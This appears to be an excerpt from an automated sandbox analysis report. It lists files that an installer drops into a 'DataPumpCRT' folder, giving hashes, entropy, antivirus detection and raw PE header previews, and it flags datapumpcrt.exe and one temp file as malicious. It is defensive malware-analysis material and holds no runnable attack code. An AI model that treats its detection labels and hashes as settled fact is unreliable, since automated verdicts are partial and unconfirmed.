SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-2N2OT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-9RJ1O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	273342460
Entropy (8bit):	0.2152224945289245
Encrypted:	false
SSDEEP:	49152:KAR60WIcEalOOAZLOh61ZDeT79qwg0lXO8zVOSIhnUuh7KWQovuZ/T7En:K8cfl4r1ZeVbYWwSPu7KWQovuZ/T7
MD5:	A8F6256F7E6C68B81633AE38A46013CE
SHA1:	03CC6C49AA11D50650E7B2090820FCBE87A00AE8
SHA-256:	DBB04015141D2CBCDDD8A984FC2340F5E537D05DB87A3A8112C5E623221C787F
SHA-512:	38D5D35E6669B87D4E5644E62385629BED8444A5BBEDB5D2E941FAD689BC9DA28640DF6DF8E285421B581A3DAAC38B80CC3F47A6271C64AF7B2DB67A3BCB5161
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..#m..pm..pm..p..po..p..pn..p..pg..p..pf..p..po..pm..p...p..py..pm..pk..p..p@..p[.pl..p...pl..pRichm..p................PE..L....".e..................%.........&2$.......%...@..........................0K...............................................+.......2.8.............................................................................%.\............................text.....%.......%................. ..`.rdata...M....%..P....%.............@..@.data...DZ... +...... +.............@....rsrc...8.....2......02.............@..@.flang........;......@;.............`...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\is-5320E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	715038
Entropy (8bit):	6.505047376817153
Encrypted:	false
SSDEEP:
MD5:	BFA161AB7F837D65C7405ACA3AAFC240
SHA1:	6B1D618EF801B6135BF193A49F8749D0864CC390
SHA-256:	D2960019D9F83C67726BF9FDB864BDF24A57F9B66A7C4E3AEE77617D73EC883E
SHA-512:	9B33EBA0A642BB3EE9A8851E520D2CE281FA31015AAC2647584A7B2AB26837C65ADF1B031B81D557602545D46EF3F33FA1D5BE64809F25453F48BBA06ECEDB2D
Malicious:	true
Reputation:	unknown
